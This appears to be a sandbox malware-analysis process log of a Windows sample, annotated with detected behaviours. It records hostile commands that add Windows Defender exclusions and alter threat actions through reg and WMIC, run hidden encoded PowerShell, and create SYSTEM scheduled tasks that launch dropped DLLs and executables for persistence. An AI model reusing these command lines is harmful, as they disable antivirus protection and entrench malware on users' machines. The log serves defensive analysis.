C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5208
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:6136
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:323⤵PID:5876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:324⤵PID:1720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:643⤵PID:5212
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:323⤵PID:3184
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:643⤵PID:2880
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:323⤵PID:324
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:643⤵PID:4308
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:323⤵PID:1816
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:643⤵PID:6084
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:323⤵PID:3552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:643⤵PID:5292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:323⤵PID:5280
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:643⤵PID:4592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4896
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2928
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5172
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5144
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:323⤵PID:4452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:643⤵PID:5000
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:323⤵PID:5296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:643⤵PID:5420
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGldCqBSz" /SC once /ST 01:48:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:4820 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGldCqBSz"2⤵PID:6068
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGldCqBSz"2⤵PID:4664
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 01:35:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe\" Wy /WFYUdidbY 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:452 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FPIEUdZLMYPzsiUNM"2⤵PID:5088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 124 -s 9162⤵
- Program crash
PID:240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5524 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1228
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3940
-
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exeC:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe Wy /WFYUdidbY 757674 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:784 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"2⤵PID:4748
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:6068
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5288
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4060
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5664 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\oSfFis.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\DrWtGlG.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OcPshDNvhDnVmSv"2⤵PID:4248
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OcPshDNvhDnVmSv"2⤵PID:2212
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\eobpTYI.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3092 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\FCOOAZD.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5308 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\SgeNsET.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:224 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\NdFpdWB.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 00:23:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\JnWpMSyk\bdOQzjG.dll\",#1 /RndidUWMO 757674" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRTHivZIQsRdEanwm"2⤵PID:2764
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FACte1" /SC once /ST 01:59:58 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5236 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FACte1"2⤵PID:712
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FACte1"2⤵PID:5512
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"2⤵PID:1324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 24562⤵
- Program crash
PID:128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 124 -ip 1241⤵PID:5296
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\JnWpMSyk\bdOQzjG.dll",#1 /RndidUWMO 7576741⤵PID:2100
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\JnWpMSyk\bdOQzjG.dll",#1 /RndidUWMO 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"3⤵PID:3324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 27681⤵PID:1716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 27681⤵PID:5492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:572 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xe4,0xe8,0xdc,0xe0,0x10c,0x7ff81e313cb8,0x7ff81e313cc8,0x7ff81e313cd82⤵PID:2924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2060 /prefetch:22⤵PID:5912
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:32⤵PID:4260
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:5880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:2604
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3432 /prefetch:82⤵PID:4436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:12⤵PID:4952
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:12⤵PID:5944
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5836 /prefetch:82⤵PID:2360
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6272 /prefetch:82⤵PID:2100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:12⤵PID:1388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:12⤵PID:2596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:12⤵PID:1144
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:12⤵PID:2852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6876 /prefetch:82⤵PID:3732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:12⤵PID:2424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:12⤵PID:5840
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:12⤵PID:6352
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:12⤵PID:6360
-
